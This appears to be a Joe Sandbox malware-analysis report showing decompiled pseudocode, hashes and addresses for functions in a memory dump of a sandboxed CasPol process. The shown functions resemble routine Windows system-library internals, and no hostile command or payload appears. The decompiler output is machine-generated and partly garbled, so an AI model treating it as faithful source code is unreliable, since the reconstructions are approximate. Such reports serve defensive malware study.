                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69a1c7a0916b5fff56cf187af5e5e9f015590dbab7b7e6626287ec9984ceb102
                                                                        • Instruction ID: 664680b1680605b2b1b72db3513a57ea81afb490b057040de84f65fe265d968f
                                                                        • Opcode Fuzzy Hash: 69a1c7a0916b5fff56cf187af5e5e9f015590dbab7b7e6626287ec9984ceb102
                                                                        • Instruction Fuzzy Hash: 59016271A00209EFDB14DFACD541A6EBBF4EF04714F504159B504DB392D635D905CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147131B Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E0147131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x14ad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E013D7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                        0x0147131b
                                                                        0x0147132a
                                                                        0x01471330
                                                                        0x01471336
                                                                        0x0147133e
                                                                        0x01471341
                                                                        0x01471344
                                                                        0x0147134f
                                                                        0x01471361
                                                                        0x01471351
                                                                        0x0147135a
                                                                        0x0147135a
                                                                        0x0147136c
                                                                        0x0147136d
                                                                        0x0147136f
                                                                        0x01471374
                                                                        0x01471387

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4129865adba1ad295cd321a6938e1d040bdd938106e4cbdbc8704b9afd37196
                                                                        • Instruction ID: 61e73ce08cbdc37a5589845aa5fe4deeb794cbde6e4657fe972d6dcaf0c8906e
                                                                        • Opcode Fuzzy Hash: b4129865adba1ad295cd321a6938e1d040bdd938106e4cbdbc8704b9afd37196
                                                                        • Instruction Fuzzy Hash: 7C013C71E01209AFDB04EFA9D545AAEBBF4FF18704F40405AB905EB391E6349A00CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E6B90 Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E013E6B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}









                                                                        0x013e6b96
                                                                        0x013e6b99
                                                                        0x013e6b9d
                                                                        0x013e6be9
                                                                        0x013e6beb
                                                                        0x013e6beb
                                                                        0x013e6bb3
                                                                        0x013e6bb3
                                                                        0x013e6bb5
                                                                        0x013e6bba
                                                                        0x013e6bc1
                                                                        0x013e6bc3
                                                                        0x013e6bc5
                                                                        0x013e6be0
                                                                        0x013e6be0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e6bc7
                                                                        0x013e6bc7
                                                                        0x013e6bd0
                                                                        0x013e6bd5
                                                                        0x013e6bd6
                                                                        0x013e6bd9
                                                                        0x00000000
                                                                        0x013e6bc7
                                                                        0x013e6ba5
                                                                        0x013e6bac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e6bae
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                        • Instruction ID: 17cd3a50a569290ef5be665153329fe1ef05062bc954d55656c42c11db696c9f
                                                                        • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                        • Instruction Fuzzy Hash: 8CF04FB5A1021EDFDF18CE4AC599AACBBF5EB64314F2440ACE5069B781D7399E00DB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01488F6A Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E01488F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x14ad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E013D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                        0x01488f6a
                                                                        0x01488f79
                                                                        0x01488f81
                                                                        0x01488f84
                                                                        0x01488f8b
                                                                        0x01488f91
                                                                        0x01488f94
                                                                        0x01488f9e
                                                                        0x01488fb0
                                                                        0x01488fa0
                                                                        0x01488fa9
                                                                        0x01488fa9
                                                                        0x01488fbb
                                                                        0x01488fbc
                                                                        0x01488fbe
                                                                        0x01488fc3
                                                                        0x01488fd6

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a80a36378bd91d06c9fb3be3f31fc0c6cb8569076c82eae1b3c5a0361f6789e6
                                                                        • Instruction ID: 280260d71cf0706ff0cb641c28f000323fc0a7fc2ed83c3d5d2a471cb6ef99a0
                                                                        • Opcode Fuzzy Hash: a80a36378bd91d06c9fb3be3f31fc0c6cb8569076c82eae1b3c5a0361f6789e6
                                                                        • Instruction Fuzzy Hash: F1014F75E0020DAFDB00EFA8D545AAEBBF4EF58304F50405ABA05EB390EA34DA00CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01471608 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E01471608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x14ad360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E013D7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                        0x01471608
                                                                        0x01471617
                                                                        0x0147161d
                                                                        0x01471625
                                                                        0x01471628
                                                                        0x0147162b
                                                                        0x01471636
                                                                        0x01471648
                                                                        0x01471638
                                                                        0x01471641
                                                                        0x01471641
                                                                        0x01471653
                                                                        0x01471654
                                                                        0x01471656
                                                                        0x0147165b
                                                                        0x0147166e

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee0a99e4a4762af676b01e4e48d14778865230d00b1e7b0a0ebd18f2005075ef
                                                                        • Instruction ID: 8fcb2bbdf36e3b12b10dc80a7eceb9e9ce09011a9b9fb40329b6424cf750ef82
                                                                        • Opcode Fuzzy Hash: ee0a99e4a4762af676b01e4e48d14778865230d00b1e7b0a0ebd18f2005075ef
                                                                        • Instruction Fuzzy Hash: 63F04F71E00248EFDB14EFA9D405AAEBBB4AF14704F444059AA05EB391E6349A00CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DC577 Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013DC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E013DC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x13911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E014888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                        0x013dc577
                                                                        0x013dc57d
                                                                        0x013dc581
                                                                        0x013dc5b5
                                                                        0x013dc5b9
                                                                        0x013dc5ce
                                                                        0x013dc5ce
                                                                        0x013dc5ca
                                                                        0x00000000
                                                                        0x013dc5ca
                                                                        0x013dc5c4
                                                                        0x013dc5c8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013dc5ad
                                                                        0x00000000
                                                                        0x013dc5af

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9581608cb063174381546d8a0803a23817a4a3f5a25575413242520390eaa709
                                                                        • Instruction ID: 73e52fa95e06912e6d39512d4072655634ccc206d075bd5ee183207a58b82014
                                                                        • Opcode Fuzzy Hash: 9581608cb063174381546d8a0803a23817a4a3f5a25575413242520390eaa709
                                                                        • Instruction Fuzzy Hash: 64F0FAB3831295DEE733832EA104B227FEB9B14238FC4A46FE40683602C2A0CC84C240
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01472073 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E01472073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0146FD22(__ecx);
				_t19 =  *0x14a849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x14a8748; // 0x0
					if(__eflags <= 0) {
						E01471C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x14a8724 & 0x00000004;
							if(( *0x14a8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x14a8724; // 0x0
					return E01468DF1(__ebx, 0xc0000374, 0x14a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                        0x01472076
                                                                        0x01472078
                                                                        0x0147207d
                                                                        0x01472083
                                                                        0x014720a4
                                                                        0x014720aa
                                                                        0x014720ac
                                                                        0x014720b7
                                                                        0x014720ba
                                                                        0x014720bc
                                                                        0x014720c9
                                                                        0x014720c9
                                                                        0x014720d0
                                                                        0x014720d2
                                                                        0x00000000
                                                                        0x014720d2
                                                                        0x014720be
                                                                        0x014720c3
                                                                        0x014720c5
                                                                        0x014720c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014720c7
                                                                        0x014720bc
                                                                        0x014720d4
                                                                        0x01472085
                                                                        0x01472085
                                                                        0x014720a3
                                                                        0x014720a3

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d47c5a417eb61cc0eddd0131b4df824a9660399df0ec0b22e5448c2f17471a8d
                                                                        • Instruction ID: 6e96997c318ab6ac469257e28b03ab70603d23bdbc45d86d9f8b72ae6339b650
                                                                        • Opcode Fuzzy Hash: d47c5a417eb61cc0eddd0131b4df824a9660399df0ec0b22e5448c2f17471a8d
                                                                        • Instruction Fuzzy Hash: 21F027AA4151D64ADE335B2935006D23F96D765114B4A044BD6901B335C5748893CB30
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F927A Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E013F927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E013FFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E013F92C6(_t11, _t14);
				}
				return _t11;
			}





                                                                        0x013f9295
                                                                        0x013f9299
                                                                        0x013f929f
                                                                        0x013f92aa
                                                                        0x013f92ad
                                                                        0x013f92ae
                                                                        0x013f92af
                                                                        0x013f92b0
                                                                        0x013f92b4
                                                                        0x013f92bb
                                                                        0x013f92bb
                                                                        0x013f92c5

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                        • Instruction ID: 55dc77363cd2ef55c331bcbd793a2e3813ba39001d7cc0fea5fdf184f130a6ee
                                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                        • Instruction Fuzzy Hash: BDE06D322406416BEB219F5ADC84B5776ADAF92739F04407DBA045E282CAE6D9198BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01488D34 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 43%
                                                                        			E01488D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x14ad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E013D7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                        0x01488d34
                                                                        0x01488d43
                                                                        0x01488d4b
                                                                        0x01488d4e
                                                                        0x01488d52
                                                                        0x01488d5c
                                                                        0x01488d6e
                                                                        0x01488d5e
                                                                        0x01488d67
                                                                        0x01488d67
                                                                        0x01488d79
                                                                        0x01488d7a
                                                                        0x01488d7c
                                                                        0x01488d81
                                                                        0x01488d94

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 417e32ff7b771265a4e332a60caaac30201f919a30113ae3fd27786a7afbff0a
                                                                        • Instruction ID: ace0aa3985ad5a3b6d8d92d85d756f0fad430cb5411b327914bede636e7209b0
                                                                        • Opcode Fuzzy Hash: 417e32ff7b771265a4e332a60caaac30201f919a30113ae3fd27786a7afbff0a
                                                                        • Instruction Fuzzy Hash: 40F0BE71E04609AFDB14EFB8D441B6EB7B4EF18304F90809AEA05EB390EA34D901CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01488B58 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 36%
                                                                        			E01488B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x14ad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E013D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                        0x01488b67
                                                                        0x01488b6f
                                                                        0x01488b72
                                                                        0x01488b7d
                                                                        0x01488b8f
                                                                        0x01488b7f
                                                                        0x01488b88
                                                                        0x01488b88
                                                                        0x01488b9a
                                                                        0x01488b9b
                                                                        0x01488b9d
                                                                        0x01488ba2
                                                                        0x01488bb5

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fea9a043a67d390b2c3b2fa040cc1d1113f890a33d6ec68e0ac1339555dc7da6
                                                                        • Instruction ID: d9c50e774420a2ed51513dff92ed4e9aa85449419ca7d9902d36c56d20e4e0bc
                                                                        • Opcode Fuzzy Hash: fea9a043a67d390b2c3b2fa040cc1d1113f890a33d6ec68e0ac1339555dc7da6
                                                                        • Instruction Fuzzy Hash: 91F082B1A14259AFDB10EBA8D906E7FB7B4EF44304F440459BA05DB391EA34D900C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013D746D Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E013D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E013CEB70(__ecx, 0x14a79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E013F95D0();
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                        0x013d746d
                                                                        0x013d746d
                                                                        0x013d746d
                                                                        0x013d7471
                                                                        0x013d7488
                                                                        0x0141f92d
                                                                        0x013d748e
                                                                        0x013d7491
                                                                        0x013d7495
                                                                        0x0141f937
                                                                        0x0141f93a
                                                                        0x0141f94e
                                                                        0x0141f953
                                                                        0x0141f956
                                                                        0x0141f956
                                                                        0x013d7495
                                                                        0x00000000
                                                                        0x013d7488
                                                                        0x013d7473
                                                                        0x013d7478
                                                                        0x013d747d
                                                                        0x013d7481
                                                                        0x00000000
                                                                        0x013d7481
                                                                        0x013d747d
                                                                        0x013d747a
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e3ef887ab02928a22dd756a3c83ef6aafa2d41a23c7bb005f82e11278024fff8
                                                                        • Instruction ID: 9b1b3e5aa0f049fa8b371a114394c3e89b453e9ebd0701097432bad7e712e0b3
                                                                        • Opcode Fuzzy Hash: e3ef887ab02928a22dd756a3c83ef6aafa2d41a23c7bb005f82e11278024fff8
                                                                        • Instruction Fuzzy Hash: 17F05232904149EADF03AB7CE840BBABFB2AF0031CF54021AE851BB161E7248C02CBC5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01488CD6 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 36%
                                                                        			E01488CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x14ad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E013D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                        0x01488ce5
                                                                        0x01488ced
                                                                        0x01488cf0
                                                                        0x01488cfb
                                                                        0x01488d0d
                                                                        0x01488cfd
                                                                        0x01488d06
                                                                        0x01488d06
                                                                        0x01488d18
                                                                        0x01488d19
                                                                        0x01488d1b
                                                                        0x01488d20
                                                                        0x01488d33

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 92ca7655150575420121cb47b0339114acbe24b6bbac3148d085e9c18f99939c
                                                                        • Instruction ID: a0eaa8dfacdc76ec6d283eb3b64fb028c8ace5fe7f4de89979b4c128b8175947
                                                                        • Opcode Fuzzy Hash: 92ca7655150575420121cb47b0339114acbe24b6bbac3148d085e9c18f99939c
                                                                        • Instruction Fuzzy Hash: D4F08271A04209AFDB04EFADE945E6EB7B4EF19204F50019AF915EB391EA34D900C754
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B4F2E Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013B4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E014888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E013DC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1391030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                        0x013b4f2e
                                                                        0x013b4f34
                                                                        0x013b4f38
                                                                        0x01410b85
                                                                        0x01410b85
                                                                        0x01410b89
                                                                        0x01410b9a
                                                                        0x01410b9a
                                                                        0x01410b9f
                                                                        0x00000000
                                                                        0x01410b9f
                                                                        0x01410b94
                                                                        0x01410b98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01410b98
                                                                        0x013b4f3e
                                                                        0x013b4f48
                                                                        0x00000000
                                                                        0x013b4f6e
                                                                        0x00000000
                                                                        0x013b4f70

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c55a16329056c896b8b074d3be23bfb07ef93c5e11eba997824b0fb4fc932ab
                                                                        • Instruction ID: 0794efc47705751d54b8698d818cccc1955c21c71aa164d9161877b2958513b2
                                                                        • Opcode Fuzzy Hash: 2c55a16329056c896b8b074d3be23bfb07ef93c5e11eba997824b0fb4fc932ab
                                                                        • Instruction Fuzzy Hash: 97F0BE725616858FD772DB9CC184B23B7D8BB00678F445467E40687B3AC734E884C640
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EA44B Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013EA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x14a7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E013FFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                        0x013ea44b
                                                                        0x013ea453
                                                                        0x013ea472
                                                                        0x013ea476
                                                                        0x00000000
                                                                        0x013ea493
                                                                        0x013ea47a
                                                                        0x013ea47f
                                                                        0x013ea486
                                                                        0x00000000

                                                                        Memory Dump Source
